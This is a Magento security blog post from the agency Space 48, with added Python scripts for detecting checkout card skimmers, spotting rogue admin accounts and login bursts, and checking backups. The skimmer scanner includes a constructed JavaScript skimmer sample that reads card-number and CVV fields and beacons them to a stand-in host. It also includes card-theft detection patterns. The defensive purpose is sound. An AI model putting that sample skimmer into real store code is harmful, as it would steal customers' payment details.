How to minimise security risks and threats with Magento
As with any ecommerce store, security is of utmost importance – both to the merchant and to the customer. Although online transactions are so commonplace now, when security is breached and customer data is compromised it has a lasting impact. In the event of a security attack or malfunction, customer confidence is affected and brand reputation is damaged.
At Space 48, we are Magento experts and our development team have specialist knowledge of the risks involved and the security measures put in place on the Magento platform. We know how important it is to make sure consumer data and payment details are safe.
This blog post sets out to explain the level of security implemented by Magento developers, whilst our technical team impart their knowledge and bring you some key tips and best practices for safeguarding your ecommerce store against hacking attempts and security threats:
How secure is Magento?
Magento is equipped with robust built-in security features, but as threats become more sophisticated there is always more that can be done to make your Magento store as resilient as possible. Magento 2 has been developed with modularity at its core and with strong ties to open source. Features that are not needed can be turned off to remove attack surface, a flaw in one module is less likely to spill over into others, and the code is reviewed by many eyes at all times.
The strength of security in Magento 2 owes a great deal to the original Magento platform, with the lessons learnt having been carried across. Magento Enterprise is a PCI-validated solution with the relevant safeguards and processes in place. Note that this covers the platform itself: the merchant's hosting, customisations, extensions and operational processes remain in scope for the store's own PCI DSS compliance.
What security risks and threats should businesses be aware of?
As hacking attempts become more sophisticated, there are always going to be risks and threats to ecommerce stores and to platforms such as Magento. However, there are teams dedicated to safeguarding against security threats, minimising risks and resolving issues if security attacks do occur. The key is for businesses to be aware of these risks and threats to help bolster their security and learn the best practices for ecommerce store stability.
Exploiting weaknesses in ecommerce stores and websites of all kinds is nothing new. The scale of the attacks is the thing which becomes increasingly difficult to deal with, as the knowledge of how to perform the exploits becomes disseminated and computing power on large network links becomes cheaper to obtain.
Common types of security attacks
There will always be threats to security, even for the most stringently secured and bolstered websites and platforms. Here are the main types of security attacks that still threaten ecommerce stores:
Website defacement
Defacing a website or online store is usually an attack aimed at spreading a particular message, often politically motivated, or sometimes simply at highlighting the poor security of a site or platform. The attacker compromises site access or hosting controls and alters or replaces the visible appearance of the site. Customer payment details are usually not at risk in an attack of this kind, but the access the attacker gained may also expose user accounts, so the break-in route needs to be found and closed, not just the page restored.
Botnets
This kind of attack is mainly a spam-related issue. A compromised server is recruited into a botnet: a network of infected machines under an attacker's control, typically used to send out spam or to take part in attacks on other sites. Although customer data may not be the target, your server's IP address can be blacklisted by spam filters, so email deliverability for order confirmations and marketing will suffer.
Server attacks
The threat of an attack on your server itself is that your website will cease to work properly. The attacker installs malware on the host, which can disrupt the site's functionality and expose the data held on it, including files and the database. It is unlikely that payment details will be at risk unless card data is stored on the server (which it should not be), but the reputation of your ecommerce store and trust in your security will be damaged.
Silent card capture
This is a severe threat to your store and one with a potentially irreparable knock-on effect if it is allowed to compromise customer payment details. In a silent card capture attack (also known as card skimming), hackers install hidden malware or card capture code that copies credit card details as customers enter them. The attack typically lives in the checkout: the attacker modifies the checkout page or the payment step so that card details are also sent to a server they control, or redirects shoppers to a fake payment page, while the genuine order still completes and nothing looks wrong to the merchant.
As the name suggests, it can go undetected for long periods, and by the time the threat has been identified it may already have caused significant damage to customer finances and brand reputation. Comparing the checkout JavaScript and templates actually served to shoppers against the known-good copies in your code repository is the quickest way to catch it.
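The comparison against a known-good copy is the definitive check, but a heuristic scan is useful when you do not have one to hand. The following is an added example (not Space 48's or Magento's code) that flags the traits checkout skimmers tend to share: a hook on form submission or keystrokes, reads of card-number or CVV fields, obfuscation such as base64 blobs, and a send to a host that the checkout has no business talking to. The allowlist of hosts and the two JavaScript samples are constructed for the example; in a real store you would point it at the theme and module sources (for example pub/static, app/design and app/code on Magento 2) and list your own domain, CDN and payment gateway.

```python
"""Heuristic scan of front-end JavaScript for card-skimmer indicators.

Added example, not code from the original post or from Magento. Legitimate
payment modules also read card fields, so a file is only rated "high" when
it both reads card data and sends something to an unexpected destination.
"""
import os
import re

# Hosts the checkout is expected to contact (constructed allowlist).
ALLOWED_HOSTS = {"shop.example.com", "cdn.example.com", "gateway.example-psp.com"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Field names a skimmer has to read to be worth anything.
CARD_FIELD_RE = re.compile(r"(card[_-]?number|cc[_-]?(number|num|cid)|cvv|cvc|expir)", re.I)
INDICATORS = {
    "submit-or-key hook": re.compile(r"addEventListener\(\s*['\"](submit|keyup|keydown|change)['\"]", re.I),
    "base64 decode": re.compile(r"\batob\(|\bfromCharCode\(", re.I),
    "beacon via image": re.compile(r"new Image\(\)\s*\)?\.src\s*=", re.I),
    "network send": re.compile(r"\bfetch\(|XMLHttpRequest|\.sendBeacon\(", re.I),
}
# A long run of base64 characters is a cheap obfuscation signal.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")


def scan_script(source):
    """Return the list of indicators found in one JavaScript source."""
    findings = [label for label, rx in INDICATORS.items() if rx.search(source)]
    if CARD_FIELD_RE.search(source):
        findings.append("reads card fields")
    if B64_RUN_RE.search(source):
        findings.append("long base64 blob")
    unknown = sorted({h for h in URL_RE.findall(source) if h.lower() not in ALLOWED_HOSTS})
    findings.extend("unexpected host: " + h for h in unknown)
    return findings


def risk(findings):
    """A skimmer must both read card data and ship it somewhere it should
    not go; either trait alone only merits a manual review."""
    reads = "reads card fields" in findings
    sends = "beacon via image" in findings or any(f.startswith("unexpected host") for f in findings)
    if reads and sends:
        return "high"
    if reads or sends or "long base64 blob" in findings:
        return "review"
    return "clean"


def scan_tree(root, exts=(".js", ".phtml", ".html")):
    """Scan every front-end source under root; returns {path: findings} for files that are not clean."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_script(fh.read())
                if risk(findings) != "clean":
                    report[path] = findings
    return report


# Constructed samples: an ordinary checkout helper and a skimmer-style hook.
CLEAN_JS = """
require(['jquery'], function ($) {
    $('#checkout-form').on('submit', function () {
        return $(this).valid();
    });
});
"""

SKIMMER_JS = """
document.addEventListener('submit', function (e) {
    var n = document.querySelector('[name="cc_number"]').value;
    var c = document.querySelector('[name="cc_cid"]').value;
    var d = btoa(n + '|' + c);
    (new Image()).src = 'https://static-analytics.example.net/p.gif?d=' + d;
});
"""

if __name__ == "__main__":
    for label, src in (("clean", CLEAN_JS), ("skimmer", SKIMMER_JS)):
        found = scan_script(src)
        print(label, risk(found), found)
```

Treat "review" results as a reading list rather than an alarm: Magento's own payment form scripts legitimately read the card fields, and a CDN you forgot to allowlist will show up as an unexpected host. A "high" result on a file you did not write is worth taking the checkout offline for until it is explained.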
“Who you gonna call?” How we help ecommerce stores to be more secure
Space 48 follow best coding practices and have a thorough code review process. One element of this process is to ensure that new security concerns are not introduced. The team undergo regular awareness sessions and training on security and we seek external advice if necessary. Our strong ties to Magento and visibility of numerous live installations ensure we know when to update Magento with new patches and are at the forefront of detecting and resolving new security vulnerabilities.
As a Magento partner and an authority on Magento 2, Space 48 give customers full support on any technical issues related to security. If an ecommerce store is subject to a security breach, we help resolve issues and deal with threats and attacks. Our technical experts provide initial investigation and advice, and in some cases we can resolve the situation ourselves. In more sophisticated and large-scale attempts or breaches we will work with relevant third parties to ensure a safe return to trading.
Here are some further details on our maintenance and support for ecommerce businesses.
Magento security best practices
Here are some key best practices from the Space 48 team to implement to ensure the stability of your ecommerce store’s security:
- Keep Magento up to date
- Consider a Web Application Firewall
- Put Distributed Denial of Service (DDoS) protection in place
- Ensure custom code is audited frequently
Services such as Cloudflare can help with WAF and DDoS protection at a reasonable cost.
Key tips for ongoing stability for your Magento store
Keep all software up to date
We advise that you keep all software (including antivirus software) on the server up to date and apply recommended security patches. Always patch or upgrade Magento as soon as a security patch is released. Once a patch is public, attackers can compare the patched and unpatched code to work out exactly what was fixed and build an exploit for unpatched stores, so the clock is ticking. Keep any other software installed on the server updated, including the web server, PHP and database software. Any weak link within your system can compromise your ecommerce store.
Only install extensions from trusted sources. Review all extensions for security issues before installing them. Magento Marketplace has an array of great extensions to choose from to add to your ecommerce store.
Ensure your operating system is secure
Work with your hosting provider to keep your operating system secure. Make sure that all the software and applications running on the server are secure and necessary. We recommend only using secure communications protocols (SSH/SFTP/HTTPS) to manage your files, and disabling plain FTP entirely, as it sends credentials and file contents in clear text.
Work with trustworthy hosts
Ensure that your hosting provider has a secure software development life cycle (SDLC) aligned with industry standards, such as those of The Open Web Application Security Project (OWASP). We would recommend hosting your site with a Magento hosting partner, as they will have a greater understanding of Magento security.
Secure your Magento Admin area
Check your Magento Admin regularly for unauthorised Admin users and review the Admin Actions Log report for suspicious activity. Hackers who gain a foothold can create fake Admin users to give themselves full access to the store, so compare the accounts in the admin_user table against the list of people who are actually supposed to have access, rather than against what merely looks familiar. Work with your hosting provider to review server logs to detect any suspicious activity, such as bursts of login attempts against the Admin URL, and implement an Intrusion Detection System (IDS) on your network.
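Both of those checks are easy to automate. The following is an added example (not Space 48's or Magento's code) that does two things: it compares rows from Magento's admin_user table against an approved list of accounts, and it looks through web-server access-log lines for an IP address that posts to the Admin login URL in a burst, which is what a password-guessing tool looks like regardless of whether any attempt succeeded. The admin rows, the log lines, the approved list, the `/admin/` path and the 20-attempts-in-5-minutes threshold are all constructed assumptions to adjust for your own store.

```python
"""Two routine Magento Admin checks: unexpected admin accounts and
login bursts in the access log. Added example, not code from the original
post or from Magento; all inputs below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Accounts the business has actually approved, username -> email (constructed).
APPROVED_ADMINS = {
    "jane.ops": "jane@shop.example.com",
    "dev.space48": "support@agency.example.com",
}

# Constructed rows, as `SELECT username, email, created, is_active FROM admin_user` would return them.
ADMIN_USERS = [
    {"username": "jane.ops", "email": "jane@shop.example.com", "created": "2017-03-02 09:14:00", "is_active": 1},
    {"username": "dev.space48", "email": "support@agency.example.com", "created": "2017-03-02 09:20:00", "is_active": 1},
    {"username": "magento_support", "email": "admin@mail-tm.example.net", "created": "2017-06-18 03:41:12", "is_active": 1},
]

# Constructed access-log lines in the common/combined format: one legitimate
# login from 198.51.100.4, then 25 POSTs in two minutes from 203.0.113.9.
ACCESS_LOG = [
    '198.51.100.4 - - [18/Jun/2017:08:00:00 +0000] "GET /admin/ HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [18/Jun/2017:08:00:09 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
] + [
    '203.0.113.9 - - [18/Jun/2017:03:%02d:%02d +0000] "POST /admin/ HTTP/1.1" 200 5123 "-" "python-requests/2.18"'
    % (40 + i // 12, (i * 5) % 60)
    for i in range(25)
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def unexpected_admins(rows, approved):
    """Flag accounts that are not on the approved list, or whose email no
    longer matches the approved one (a common way to hijack password resets)."""
    flagged = []
    for row in rows:
        expected = approved.get(row["username"])
        if expected is None:
            flagged.append((row["username"], "not on approved list", row["created"]))
        elif expected.lower() != row["email"].lower():
            flagged.append((row["username"], "email changed to " + row["email"], row["created"]))
    return flagged


def login_bursts(lines, admin_path="/admin/", threshold=20, window=timedelta(minutes=5)):
    """Return {ip: total_posts} for IPs that POSTed to the Admin path at least
    `threshold` times within any `window`. Status codes are deliberately
    ignored: the burst itself is the signal."""
    posts = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, _status = m.groups()
        if method == "POST" and path.startswith(admin_path):
            posts[ip].append(datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"))
    bursts = {}
    for ip, times in posts.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                bursts[ip] = len(times)
                break
    return bursts


if __name__ == "__main__":
    for user, why, created in unexpected_admins(ADMIN_USERS, APPROVED_ADMINS):
        print("admin account", user, why, "created", created)
    for ip, count in login_bursts(ACCESS_LOG).items():
        print("login burst from", ip, count, "POSTs")
```

Run the first check from a job that reads the table on a schedule and emails the diff; the approved list then becomes a record you have to update deliberately when someone joins or leaves. For the second, feed it the raw access log of the host serving the Admin URL (Magento's own log will not show attempts that never reached PHP), and pair any flagged IP with the Admin Actions Log to see whether a guess eventually succeeded.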
Strengthen and periodically change your passwords.
This sounds like an obvious one, but it is so important that you change your passwords on a regular basis and give them ap
Additional tips for monitoring security
Use MageReport to scan your store regularly
We recommend you scan your ecommerce store monthly for malware. Use the highly-regarded MageReport tool, which comes at no additional cost for merchants.
Subscribe to Magento Security Alerts
Magento regularly releases security patches, so it is important to make sure all of these are installed on your store to keep the system up to date. You can stay informed of new patches by subscribing to Magento Security Alerts.
Back everything up
Set up automatic backups for your server and database so that they are taken regularly. But don't forget to test them: a backup job that reports success can still produce a truncated or incomplete dump, so check the files it produces and periodically restore one into a scratch environment as an added continuity measure.
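A restore into a scratch database is the real test, but a few automated sanity checks on each dump will catch the common silent failures first: a file that is far too small, one that is stale because the job stopped running, a gzip stream cut off part-way, a dump missing the tables you cannot trade without, or one without mysqldump's closing "Dump completed" line. The following is an added example (not Space 48's code); the list of required tables and the 26-hour freshness limit are assumptions, and the sample dumps are constructed in a temporary directory so the script runs offline.

```python
"""Sanity checks on a gzipped mysqldump backup. Added example, not code from
the original post. Assumes daily dumps of the Magento database compressed
with gzip; required tables and limits are assumptions to adjust per store.
"""
import gzip
import os
import tempfile
import time
import zlib

# Tables the store cannot trade without (assumption; add your own).
REQUIRED_TABLES = ("admin_user", "sales_order", "customer_entity")


def check_dump(path, required=REQUIRED_TABLES, max_age_hours=26, min_bytes=1024):
    """Return a list of problems with the dump at `path`; an empty list means it passed."""
    problems = []
    if not os.path.exists(path):
        return ["missing"]
    st = os.stat(path)
    if st.st_size < min_bytes:
        problems.append("too small")
    if time.time() - st.st_mtime > max_age_hours * 3600:
        problems.append("stale")
    try:
        with gzip.open(path, "rt", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except (OSError, EOFError, zlib.error) as exc:
        # A dump cut off mid-stream fails here rather than on restore night.
        return problems + ["unreadable: %s" % exc]
    for table in required:
        if "CREATE TABLE `%s`" % table not in text:
            problems.append("missing table " + table)
    # mysqldump writes this trailer last; without it the dump did not finish.
    if "-- Dump completed" not in text[-300:]:
        problems.append("truncated")
    return problems


def make_sample_dump(path, complete=True):
    """Write a constructed dump with the shape mysqldump produces."""
    body = "-- MySQL dump 10.13  Distrib 5.7.18\n"
    for table in REQUIRED_TABLES:
        body += "DROP TABLE IF EXISTS `%s`;\n" % table
        body += "CREATE TABLE `%s` (`id` int NOT NULL) ENGINE=InnoDB;\n" % table
        body += "INSERT INTO `%s` VALUES (1),(2);\n" % table
    body += "-- " + os.urandom(4096).hex() + "\n"  # incompressible bulk so the file has realistic size
    if complete:
        body += "-- Dump completed on 2017-06-18  2:00:05\n"
    with gzip.open(path, "wt", encoding="utf-8") as fh:
        fh.write(body)


def build_samples():
    """Create good, unfinished and cut-off dumps in a temp dir; returns their paths."""
    d = tempfile.mkdtemp(prefix="dumpcheck-")
    good = os.path.join(d, "good.sql.gz")
    unfinished = os.path.join(d, "unfinished.sql.gz")
    cut = os.path.join(d, "cut.sql.gz")
    make_sample_dump(good, complete=True)
    make_sample_dump(unfinished, complete=False)
    with open(good, "rb") as fh:
        data = fh.read()
    with open(cut, "wb") as fh:
        fh.write(data[: len(data) // 2])  # gzip stream truncated part-way
    return {"good": good, "unfinished": unfinished, "cut": cut}


if __name__ == "__main__":
    for label, path in build_samples().items():
        print(label, check_dump(path) or "ok")
```

Wire `check_dump` into the backup job so that a non-empty result fails the job loudly; a backup that is only ever checked on the day you need it is not a backup. Keep the periodic restore test as well, because a dump can be complete and still unusable if, for example, it was taken with the wrong character set or without the stored procedures the store relies on.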
For more on security best practices for Magento ecommerce stores, check out this detailed resource: Magento security: best practices
We hope this blog has offered you assurances about the stability of Magento and the security measures put in place to minimise risks and counter the threat of web attacks. Our security tips and best practices should help existing Magento users to better safeguard their ecommerce stores and add another level of protection to their security controls.
Our team of experts offers customers extensive support and advice on the security and maintenance of their ecommerce stores. If you already use the Magento platform for your store and want further security advice or you are considering replatforming your store to Magento or Magento 2, get in touch with our team now, or arrange an audit.